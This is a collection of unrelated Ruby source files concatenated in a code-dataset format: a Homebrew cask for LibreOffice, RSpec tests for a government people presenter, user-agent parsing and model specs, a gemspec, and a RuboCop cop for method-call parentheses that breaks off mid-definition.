livecheck do
url "https://download.documentfoundation.org/libreoffice/testing/#{version.major_minor_patch}/mac/x86_64/"
strategy :page_match
regex(/href="LibreOffice_(\d+(?:\.\d+)*)_MacOS_x86-64.dmg"/i)
end
conflicts_with cask: [
"libreoffice",
"homebrew/cask-versions/libreoffice-still",
]
depends_on macos: ">= :yosemite"
app "LibreOffice.app"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/gengal"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/regmerge"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/regview"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/senddoc"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/ui-previewer"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/uno"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/unoinfo"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/unopkg"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/uri-encode"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/xpdfimport"
# shim script (https://github.com/Homebrew/homebrew-cask/issues/18809)
shimscript = "#{staged_path}/soffice.wrapper.sh"
binary shimscript, target: "soffice"
preflight do
IO.write shimscript, <<~EOS
#!/bin/sh
'#{appdir}/LibreOffice.app/Contents/MacOS/soffice' "$@"
EOS
end
zap trash: [
"~/Library/Application Support/LibreOffice",
"~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/org.libreoffice.script.sfl*",
"~/Library/Preferences/org.libreoffice.script.plist",
"~/Library/Saved Application State/org.libreoffice.script.savedState",
]
end
| 42.821429 | 183 | 0.755213 |
e85b97bfb0d0dae01d14a188134b874514939454 | 7,003 | RSpec.describe Organisations::PeoplePresenter do
include SearchApiHelpers
include OrganisationHelpers
describe "ministers" do
let(:people_presenter) { presenter_from_organisation_hash(organisation_with_ministers) }
it "formats data for image card component" do
expected = {
title: "Our ministers",
people: {
brand: "attorney-generals-office",
href: "/government/people/oliver-dowden",
image_src: "/photo/oliver-dowden",
description: nil,
metadata: nil,
heading_text: "Oliver Dowden CBE MP",
lang: "en",
heading_level: 0,
extra_details_no_indent: true,
extra_details: [
{
text: "Parliamentary Secretary (Minister for Implementation)",
href: "/government/ministers/parliamentary-secretary",
},
],
},
}
expect(people_presenter.all_people.first[:title]).to eq(expected[:title])
expect(people_presenter.all_people.first[:people][0]).to eq(expected[:people])
end
it "handles ministers with multiple roles" do
expected = {
title: "Our ministers",
people: {
brand: "attorney-generals-office",
href: "/government/people/theresa-may",
image_src: "/photo/theresa-may",
description: nil,
metadata: nil,
heading_text: "The Rt Hon Theresa May MP",
lang: "en",
heading_level: 0,
extra_details_no_indent: true,
extra_details: [
{
text: "Prime Minister",
href: "/government/ministers/prime-minister",
},
{
text: "Minister for the Civil Service",
href: "/government/ministers/minister-for-the-civil-service",
},
],
},
}
expect(people_presenter.all_people.first[:title]).to eq(expected[:title])
expect(people_presenter.all_people.first[:people][2]).to eq(expected[:people])
end
it "orders minister roles by seniority" do
expected = {
title: "Our ministers",
people: {
brand: "attorney-generals-office",
href: "/government/people/victoria-atkins",
image_src: "/photo/victoria-atkins",
description: nil,
metadata: nil,
heading_text: "Victoria Atkins MP",
lang: "en",
heading_level: 0,
extra_details_no_indent: true,
extra_details: [
{
text: "Minister of State",
href: "/government/ministers/minister-of-state--61",
},
{
text: "Minister for Afghan Resettlement",
href: "/government/ministers/minister-for-afghan-resettlement",
},
],
},
}
expect(people_presenter.all_people.first[:people][3]).to eq(expected[:people])
end
it "returns minister without image if no image available" do
expected = {
title: "Our ministers",
people: {
brand: "attorney-generals-office",
href: "/government/people/stuart-andrew",
description: nil,
metadata: nil,
heading_text: "Stuart Andrew MP",
lang: "en",
heading_level: 0,
extra_details_no_indent: true,
extra_details: [
{
text: "Parliamentary Under Secretary of State",
href: "/government/ministers/parliamentary-under-secretary-of-state--94",
},
],
},
}
expect(people_presenter.all_people.first[:title]).to eq(expected[:title])
expect(people_presenter.all_people.first[:people][1]).to eq(expected[:people])
end
end
describe "non-ministers" do
let(:people_presenter) { presenter_from_organisation_hash(organisation_with_board_members) }
it "keeps the order for types of people" do
no_people_presenter = presenter_from_organisation_hash(organisation_with_no_people)
expected = [
{
type: :ministers,
title: "Our ministers",
people: [],
lang: false,
},
{
type: :military_personnel,
title: "Our senior military officials",
people: [],
lang: false,
},
{
type: :board_members,
title: "Our management",
people: [],
lang: false,
},
{
type: :traffic_commissioners,
title: "Traffic commissioners",
people: [],
lang: false,
},
{
type: :special_representatives,
title: "Special representatives",
people: [],
lang: false,
},
{
type: :chief_professional_officers,
title: "Chief professional officers",
people: [],
lang: false,
},
]
expect(no_people_presenter.all_people).to eq(expected)
end
it "displays role as descriptions rather than links" do
expect(people_presenter.all_people.third[:people][0][:description]).to eq("Cabinet Secretary")
expect(people_presenter.all_people.third[:people][0][:extra_details]).to be_nil
end
it "handles non-ministers with multiple roles" do
expected = "Chief Executive of the Civil Service, Permanent Secretary (Cabinet Office)"
expect(people_presenter.all_people.third[:people][1][:description]).to eq(expected)
end
it "does not show images for non-important board members" do
non_important_board_members = presenter_from_organisation_hash(organisation_with_non_important_board_members)
expected_important = {
brand: "attorney-generals-office",
href: "/government/people/jeremy-heywood",
description: "Cabinet Secretary",
metadata: "Unpaid",
heading_text: "Sir Jeremy Heywood",
lang: "en",
heading_level: 0,
extra_details_no_indent: true,
image_src: "/photo/jeremy-heywood",
}
expected_non_important = {
brand: "attorney-generals-office",
href: "/government/people/john-manzoni",
description: "Chief Executive of the Civil Service",
metadata: nil,
heading_text: "John Manzoni",
lang: "en",
heading_level: 0,
extra_details_no_indent: true,
}
expect(non_important_board_members.all_people.third[:people][0]).to eq(expected_important)
expect(non_important_board_members.all_people.third[:people][1]).to eq(expected_non_important)
end
it "fetches image" do
expect(people_presenter.all_people.third[:people][0][:image_src]).to eq("/photo/jeremy-heywood")
end
end
def presenter_from_organisation_hash(content)
content_item = ContentItem.new(content)
organisation = Organisation.new(content_item)
Organisations::PeoplePresenter.new(organisation)
end
end
| 32.123853 | 115 | 0.593746 |
ac142f58c16a14714d14ba46bffc5f78831c5b7e | 727 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'bundler/setup'
require 'database_cleaner/active_record'
require 'pry'
require 'simplecov'
SimpleCov.start do
enable_coverage :branch
add_filter { |src| src.filename =~ %r,db/(connection|models|schema), }
add_filter 'spec/activerecord'
end
require 'activerecord/wrapped_transaction'
require_relative '../db/connection'
RSpec::Matchers.define_negated_matcher :never_yield_control, :yield_control
RSpec.configure do |config|
config.before(:suite) do
DatabaseCleaner.strategy = :transaction
DatabaseCleaner.clean_with :truncation
end
config.around(:each) do |example|
DatabaseCleaner.cleaning do
example.run
end
end
end
| 22.71875 | 75 | 0.76066 |
1860a1718e86de3cd465f8328efc57ee7e823fc5 | 344 | require File.expand_path('../test_helper', __FILE__)
require 'hopper/queue'
require 'hopper/channel'
module Hopper
module Test
class Listener
@channel = Hopper::Channel.new
@queue = Hopper::Queue.new("hopper-perftest-out").listener(@channel)
@queue.listen do |msg|
msg.acknowledge
end
end
end
end
| 19.111111 | 74 | 0.668605 |
1d88129264c48ef5e42c3ac9f621d23ef73549b5 | 1,794 | require "spec_helper"
describe Volunteer do
describe '#name' do
it 'returns the name of the volunteer' do
test_volunteer = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
expect(test_volunteer.name).to eq 'Jane'
end
end
describe '#project_id' do
it 'returns the project_id of the volunteer' do
test_volunteer = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
expect(test_volunteer.project_id).to eq 1
end
end
describe '#==' do
it 'checks for equality based on the name of a volunteer' do
volunteer1 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
volunteer2 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
expect(volunteer1 == volunteer2).to eq true
end
end
context '.all' do
it 'is empty to start' do
expect(Volunteer.all).to eq []
end
it 'returns all volunteers' do
volunteer1 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
volunteer1.save
volunteer2 = Volunteer.new({:name => 'Joe', :project_id => 1, :id => nil})
volunteer2.save
expect(Volunteer.all).to eq [volunteer1, volunteer2]
end
end
describe '#save' do
it 'adds a volunteer to the database' do
volunteer1 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
volunteer1.save
expect(Volunteer.all).to eq [volunteer1]
end
end
describe '.find' do
it 'returns a volunteer by id' do
volunteer1 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
volunteer1.save
volunteer2 = Volunteer.new({:name => 'Joe', :project_id => 1, :id => nil})
volunteer2.save
expect(Volunteer.find(volunteer1.id)).to eq volunteer1
end
end
end
| 31.473684 | 85 | 0.618729 |
26b97b1d86998ee378afdd4aae903642b5b91d2f | 87 | # desc "Explaining what the task does"
# task :good_item do
# # Task goes here
# end
| 17.4 | 38 | 0.678161 |
4ab485a417c2c44a4dd4027832186d627c1115e0 | 67 | module Houston
module Exceptions
VERSION = "0.0.1"
end
end
| 11.166667 | 21 | 0.671642 |
03e10639d632d6b79fd5ab0af2a844c27ff46aa2 | 1,468 | #
# Be sure to run `pod lib lint YourPod.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'YourPod'
s.version = '0.1.1'
s.summary = '一个简短的pod介绍。。。'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = '一个很长的描述说明信息'
s.homepage = 'https://github.com/Bluter/YourPod'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'Bluter' => 'xx@pxx' }
s.source = { :git => 'https://github.com/Bluter/YourPod.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
s.source_files = 'YourPod/Classes/**/*.{h,m}'
s.resource_bundles = {
'YourPod' => ['YourPod/Assets/*.png']
}
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
s.dependency 'AFNetworking', '~> 2.3'
end
| 35.804878 | 98 | 0.632834 |
e86d7de3acdaae9691d7a77985cf6736e0ee36f4 | 2,316 | # frozen_string_literal: true
require "spec_helper"
RSpec.describe "Mapper definition DSL" do
include_context "container"
before do
configuration.relation(:users)
users = configuration.default.dataset(:users)
users.insert(name: "Joe", roles: ["admin", "user", "user", nil])
users.insert(name: "Jane", roles: "user")
users.insert(name: "John")
end
describe "unfold" do
let(:mapped_users) { container.relations[:users].map_with(:users).to_a }
it "splits the attribute" do
configuration.mappers do
define(:users) { unfold :roles }
end
expect(mapped_users).to eql [
{name: "Joe", roles: "admin"},
{name: "Joe", roles: "user"},
{name: "Joe", roles: "user"},
{name: "Joe", roles: nil},
{name: "Jane", roles: "user"},
{name: "John"}
]
end
it "renames unfolded attribute when necessary" do
configuration.mappers do
define(:users) { unfold :role, from: :roles }
end
expect(mapped_users).to eql [
{name: "Joe", role: "admin"},
{name: "Joe", role: "user"},
{name: "Joe", role: "user"},
{name: "Joe", role: nil},
{name: "Jane", role: "user"},
{name: "John"}
]
end
it "rewrites the existing attribute" do
configuration.mappers do
define(:users) { unfold :name, from: :roles }
end
expect(mapped_users).to eql [
{name: "admin"},
{name: "user"},
{name: "user"},
{name: nil},
{name: "user"},
{}
]
end
it "ignores the absent attribute" do
configuration.mappers do
define(:users) { unfold :foo, from: :absent }
end
expect(mapped_users).to eql [
{name: "Joe", roles: ["admin", "user", "user", nil]},
{name: "Jane", roles: "user"},
{name: "John"}
]
end
it "accepts block" do
configuration.mappers do
define(:users) { unfold(:role, from: :roles) {} }
end
expect(mapped_users).to eql [
{name: "Joe", role: "admin"},
{name: "Joe", role: "user"},
{name: "Joe", role: "user"},
{name: "Joe", role: nil},
{name: "Jane", role: "user"},
{name: "John"}
]
end
end
end
| 24.638298 | 76 | 0.528929 |
bfa5f8561e206c074aaf186cfda13eef5c11a789 | 13,718 | require 'user_agent'
shared_examples_for "Firefox browser" do
it "should return 'Firefox' as its browser" do
@useragent.browser.should == "Firefox"
end
it "should return :strong as its security" do
@useragent.security.should == :strong
end
it { @useragent.should_not be_webkit }
end
describe 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8' do
before do
@useragent = UserAgent.parse('Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8')
end
it_should_behave_like "Firefox browser"
it "should return '4.0b8' as its version" do
@useragent.version.should == "4.0b8"
end
it "should return '20100101' as its gecko version" do
@useragent.gecko.version.should == "20100101"
end
it "should return 'Macintosh' as its platform" do
@useragent.platform.should == "Macintosh"
end
it "should return 'OS X 10.6' as its os" do
@useragent.os.should == "OS X 10.6"
end
it "should return nil as its localization" do
@useragent.localization.should be_nil
end
it { @useragent.should_not be_mobile }
end
describe 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13' do
before do
@useragent = UserAgent.parse('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13')
end
it_should_behave_like "Firefox browser"
it "should return '3.6.13' as its version" do
@useragent.version.should == "3.6.13"
end
it "should return '20101203' as its gecko version" do
@useragent.gecko.version.should == "20101203"
end
it "should return 'Macintosh' as its platform" do
@useragent.platform.should == "Macintosh"
end
it "should return 'OS X 10.6' as its os" do
@useragent.os.should == "OS X 10.6"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
it { @useragent.should_not be_mobile }
end
describe "UserAgent: 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1")
end
it_should_behave_like "Firefox browser"
it "should return '3.0.1' as its version" do
@useragent.version.should == "3.0.1"
end
it "should return '2008070206' as its gecko version" do
@useragent.gecko.version.should == "2008070206"
end
it "should return 'X11' as its platform" do
@useragent.platform.should == "X11"
end
it "should return 'Linux i686' as its os" do
@useragent.os.should == "Linux i686"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
it { @useragent.should_not be_mobile }
end
describe "UserAgent: 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14")
end
it_should_behave_like "Firefox browser"
it "should return '2.0.0.14' as its version" do
@useragent.version.should == "2.0.0.14"
end
it "should return '20080404' as its gecko version" do
@useragent.gecko.version.should == "20080404"
end
it "should return 'Macintosh' as its platform" do
@useragent.platform.should == "Macintosh"
end
it "should return 'OS X' as its os" do
@useragent.os.should == "OS X"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
end
describe "UserAgent: 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14")
end
it_should_behave_like "Firefox browser"
it "should return '2.0.0.14' as its version" do
@useragent.version.should == "2.0.0.14"
end
it "should return '20080404' as its gecko version" do
@useragent.gecko.version.should == "20080404"
end
it "should return 'Windows' as its platform" do
@useragent.platform.should == "Windows"
end
it "should return 'Windows XP' as its os" do
@useragent.os.should == "Windows XP"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
end
describe "UserAgent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1")
end
it_should_behave_like "Firefox browser"
it "should return '16.0.1' as its version" do
@useragent.version.should == "16.0.1"
end
it "should return '20121011' as its gecko version" do
@useragent.gecko.version.should == "20121011"
end
it "should return 'Windows' as its platform" do
@useragent.platform.should == "Windows"
end
it "should return 'Windows 7' as its os" do
@useragent.os.should == "Windows 7"
end
it "should return nil as its localization" do
@useragent.localization.should be_nil
end
end
describe "UserAgent: 'Mozilla/5.0 (Windows NT 6.1; Win64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (Windows NT 6.1; Win64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1")
end
it_should_behave_like "Firefox browser"
it "should return '16.0.1' as its version" do
@useragent.version.should == "16.0.1"
end
it "should return '20121011' as its gecko version" do
@useragent.gecko.version.should == "20121011"
end
it "should return 'Windows' as its platform" do
@useragent.platform.should == "Windows"
end
it "should return 'Windows 7' as its os" do
@useragent.os.should == "Windows 7"
end
it "should return nil as its localization" do
@useragent.localization.should be_nil
end
end
describe 'Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0' do
before do
@useragent = UserAgent.parse('Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0')
end
it_should_behave_like "Firefox browser"
it "should return '17.0' as its version" do
@useragent.version.should == "17.0"
end
it "should return '20100101' as its gecko version" do
@useragent.gecko.version.should == "20100101"
end
it "should return 'Windows' as its platform" do
@useragent.platform.should == "Windows"
end
it "should return 'Windows XP' as its os" do
@useragent.os.should == "Windows XP"
end
it "should return nil as its localization" do
@useragent.localization.should be_nil
end
end
describe 'UserAgent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0' do
before do
@useragent = UserAgent.parse('Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0')
end
it_should_behave_like "Firefox browser"
it "should return '17.0' as its version" do
@useragent.version.should == "17.0"
end
it "should return '20100101' as its gecko version" do
@useragent.gecko.version.should == "20100101"
end
it "should return 'Windows' as its platform" do
@useragent.platform.should == "Windows"
end
it "should return 'Windows 7' as its os" do
@useragent.os.should == "Windows 7"
end
it "should return nil as its localization" do
@useragent.localization.should be_nil
end
end
describe "UserAgent: 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12")
end
it_should_behave_like "Firefox browser"
it "should return '1.5.0.12' as its version" do
@useragent.version.should == "1.5.0.12"
end
it "should return '20070508' as its gecko version" do
@useragent.gecko.version.should == "20070508"
end
it "should return 'Macintosh' as its platform" do
@useragent.platform.should == "Macintosh"
end
it "should return 'PPC Mac OS X Mach-O' as its os" do
@useragent.os.should == "OS X"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
end
describe "UserAgent: 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12")
end
it_should_behave_like "Firefox browser"
it "should return '1.5.0.12' as its version" do
@useragent.version.should == "1.5.0.12"
end
it "should return '20070508' as its gecko version" do
@useragent.gecko.version.should == "20070508"
end
it "should return 'Windows' as its platform" do
@useragent.platform.should == "Windows"
end
it "should return 'Windows XP' as its os" do
@useragent.os.should == "Windows XP"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
end
describe "UserAgent: 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060612 Firefox/1.5.0.4 Flock/0.7.0.17.1'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060612 Firefox/1.5.0.4 Flock/0.7.0.17.1")
end
it_should_behave_like "Firefox browser"
it "should return '1.5.0.4' as its version" do
@useragent.version.should == "1.5.0.4"
end
it "should return '20060612' as its gecko version" do
@useragent.gecko.version.should == "20060612"
end
it "should return 'X11' as its platform" do
@useragent.platform.should == "X11"
end
it "should return 'Linux i686' as its os" do
@useragent.os.should == "Linux i686"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
end
describe "UserAgent: 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.14) Gecko/20080409 Camino/1.6 (like Firefox/2.0.0.14)'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.14) Gecko/20080409 Camino/1.6 (like Firefox/2.0.0.14)")
end
it "should return 'Camino' as its browser" do
@useragent.browser.should == "Camino"
end
it "should return '1.6' as its version" do
@useragent.version.should == "1.6"
end
it "should return '20080409' as its gecko version" do
@useragent.gecko.version.should == "20080409"
end
it "should return 'Macintosh' as its platform" do
@useragent.platform.should == "Macintosh"
end
it "should return 'OS X' as its os" do
@useragent.os.should == "OS X"
end
it "should return 'en' as its localization" do
@useragent.localization.should == "en"
end
end
describe 'UserAgent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Iceweasel/2.0 (Debian-2.0+dfsg-1)' do
before do
@useragent = UserAgent.parse('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Iceweasel/2.0 (Debian-2.0+dfsg-1)')
end
it "should return 'Iceweasel' as its browser" do
@useragent.browser.should == "Iceweasel"
end
it "should return '2.0' as its version" do
@useragent.version.should == "2.0"
end
it "should return '20061024' as its gecko version" do
@useragent.gecko.version.should == "20061024"
end
it "should return 'X11' as its platform" do
@useragent.platform.should == "X11"
end
it "should return 'Linux i686' as its os" do
@useragent.os.should == "Linux i686"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
end
describe 'UserAgent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.4) Gecko/20091017 SeaMonkey/2.0' do
before do
@useragent = UserAgent.parse('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.4) Gecko/20091017 SeaMonkey/2.0')
end
it "should return 'Seamonkey' as its browser" do
@useragent.browser.should == "Seamonkey"
end
it "should return '2.0' as its version" do
@useragent.version.should == "2.0"
end
it "should return '20091017' as its gecko version" do
@useragent.gecko.version.should == "20091017"
end
it "should return 'Macintosh' as its platform" do
@useragent.platform.should == "Macintosh"
end
it "should return 'OS X 10.6' as its os" do
@useragent.os.should == "OS X 10.6"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
end
describe 'Mozilla/5.0 (Android; Mobile; rv:19.0) Gecko/19.0 Firefox/19.0' do
before do
@useragent = UserAgent.parse('Mozilla/5.0 (Android; Mobile; rv:19.0) Gecko/19.0 Firefox/19.0')
end
it "should return true for mobile?" do
@useragent.mobile?.should be_true
end
end
describe 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x' do
before do
@useragent = UserAgent.parse('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x')
end
it_should_behave_like "Firefox browser"
it "should return 'x.x' as its version" do
@useragent.version.should == "x.x"
end
it "should return '20041107' as its gecko version" do
@useragent.gecko.version.should == "20041107"
end
it "should return 'Windows' as its platform" do
@useragent.platform.should == "Windows"
end
it "should return 'Windows XP' as its os" do
@useragent.os.should == "Windows XP"
end
end
| 28.519751 | 145 | 0.68093 |
bfcce0441c7296a13b6ef9ce2080c53eef0e370b | 8,604 | # frozen_string_literal: true
module RuboCop
module Cop
module Style
# This cop enforces the presence (default) or absence of parentheses in
# method calls containing parameters.
#
# In the default style (require_parentheses), macro methods are ignored.
# Additional methods can be added to the `IgnoredMethods` list. This
# option is valid only in the default style.
#
# In the alternative style (omit_parentheses), there are two additional
# options.
#
# 1. `AllowParenthesesInChaining` is `false` by default. Setting it to
# `true` allows the presence of parentheses in the last call during
# method chaining.
#
# 2. `AllowParenthesesInMultilineCall` is `false` by default. Setting it
# to `true` allows the presence of parentheses in multi-line method
# calls.
#
# @example EnforcedStyle: require_parentheses
#
#
# # bad
# array.delete e
#
# # good
# array.delete(e)
#
# # good
# # Operators don't need parens
# foo == bar
#
# # good
# # Setter methods don't need parens
# foo.bar = baz
#
# # okay with `puts` listed in `IgnoredMethods`
# puts 'test'
#
# # IgnoreMacros: true (default)
#
# # good
# class Foo
# bar :baz
# end
#
# # IgnoreMacros: false
#
# # bad
# class Foo
# bar :baz
# end
#
# @example EnforcedStyle: omit_parentheses
#
# # bad
# array.delete(e)
#
# # good
# array.delete e
#
# # bad
# foo.enforce(strict: true)
#
# # good
# foo.enforce strict: true
#
# # AllowParenthesesInMultilineCall: false (default)
#
# # bad
# foo.enforce(
# strict: true
# )
#
# # good
# foo.enforce \
# strict: true
#
# # AllowParenthesesInMultilineCall: true
#
# # good
# foo.enforce(
# strict: true
# )
#
# # good
# foo.enforce \
# strict: true
#
# # AllowParenthesesInChaining: false (default)
#
# # bad
# foo().bar(1)
#
# # good
# foo().bar 1
#
# # AllowParenthesesInChaining: true
#
# # good
# foo().bar(1)
#
# # good
# foo().bar 1
class MethodCallWithArgsParentheses < Cop
include ConfigurableEnforcedStyle
include IgnoredMethods
TRAILING_WHITESPACE_REGEX = /\s+\Z/.freeze
def on_send(node)
case style
when :require_parentheses
add_offense_for_require_parentheses(node)
when :omit_parentheses
add_offense_for_omit_parentheses(node)
end
end
alias on_super on_send
alias on_yield on_send
def autocorrect(node)
case style
when :require_parentheses
autocorrect_for_require_parentheses(node)
when :omit_parentheses
autocorrect_for_omit_parentheses(node)
end
end
def message(_node = nil)
case style
when :require_parentheses
'Use parentheses for method calls with arguments.'.freeze
when :omit_parentheses
'Omit parentheses for method calls with arguments.'.freeze
end
end
private
def add_offense_for_require_parentheses(node)
return if ignored_method?(node.method_name)
return if eligible_for_parentheses_omission?(node)
return unless node.arguments? && !node.parenthesized?
add_offense(node)
end
def add_offense_for_omit_parentheses(node)
return unless node.parenthesized?
return if node.implicit_call?
return if super_call_without_arguments?(node)
return if camel_case_method_call_without_arguments?(node)
return if eligible_for_parentheses_presence?(node)
add_offense(node, location: node.loc.begin.join(node.loc.end))
end
def autocorrect_for_require_parentheses(node)
lambda do |corrector|
corrector.replace(args_begin(node), '(')
unless args_parenthesized?(node)
corrector.insert_after(args_end(node), ')')
end
end
end
def autocorrect_for_omit_parentheses(node)
lambda do |corrector|
if parentheses_at_the_end_of_multiline_call?(node)
corrector.replace(args_begin(node), ' \\')
else
corrector.replace(args_begin(node), ' ')
end
corrector.remove(node.loc.end)
end
end
def eligible_for_parentheses_omission?(node)
node.operator_method? || node.setter_method? || ignore_macros?(node)
end
def ignore_macros?(node)
cop_config['IgnoreMacros'] && node.macro?
end
def args_begin(node)
loc = node.loc
selector =
node.super_type? || node.yield_type? ? loc.keyword : loc.selector
resize_by = args_parenthesized?(node) ? 2 : 1
selector.end.resize(resize_by)
end
def args_end(node)
node.loc.expression.end
end
def args_parenthesized?(node)
return false unless node.arguments.one?
first_node = node.arguments.first
first_node.begin_type? && first_node.parenthesized_call?
end
def parentheses_at_the_end_of_multiline_call?(node)
node.multiline? &&
node.loc.begin.source_line
.gsub(TRAILING_WHITESPACE_REGEX, '')
.end_with?('(')
end
def super_call_without_arguments?(node)
node.super_type? && node.arguments.none?
end
def camel_case_method_call_without_arguments?(node)
node.camel_case_method? && node.arguments.none?
end
def eligible_for_parentheses_presence?(node)
call_in_literals?(node) ||
call_with_ambiguous_arguments?(node) ||
call_in_logical_operators?(node) ||
allowed_multiline_call_with_parentheses?(node) ||
allowed_chained_call_with_parentheses?(node)
end
def call_in_literals?(node)
node.parent &&
(node.parent.pair_type? ||
node.parent.array_type? ||
ternary_if?(node.parent))
end
def call_in_logical_operators?(node)
node.parent &&
(logical_operator?(node.parent) ||
node.parent.descendants.any?(&method(:logical_operator?)))
end
def call_with_ambiguous_arguments?(node)
call_with_braced_block?(node) ||
call_as_argument?(node) ||
hash_literal_in_arguments?(node) ||
node.descendants.any? do |n|
splat?(n) || ternary_if?(n) || logical_operator?(n)
end
end
def call_with_braced_block?(node)
node.block_node && node.block_node.braces?
end
def call_as_argument?(node)
node.parent && node.parent.send_type?
end
def hash_literal_in_arguments?(node)
node.arguments.any? do |n|
hash_literal?(n) ||
n.send_type? && node.descendants.any?(&method(:hash_literal?))
end
end
def allowed_multiline_call_with_parentheses?(node)
cop_config['AllowParenthesesInMultilineCall'] && node.multiline?
end
def allowed_chained_call_with_parentheses?(node)
return unless cop_config['AllowParenthesesInChaining']
previous = node.descendants.first
return false unless previous && previous.send_type?
previous.parenthesized? ||
allowed_chained_call_with_parentheses?(previous)
end
def splat?(node)
node.splat_type? || node.kwsplat_type? || node.block_pass_type?
end
def ternary_if?(node)
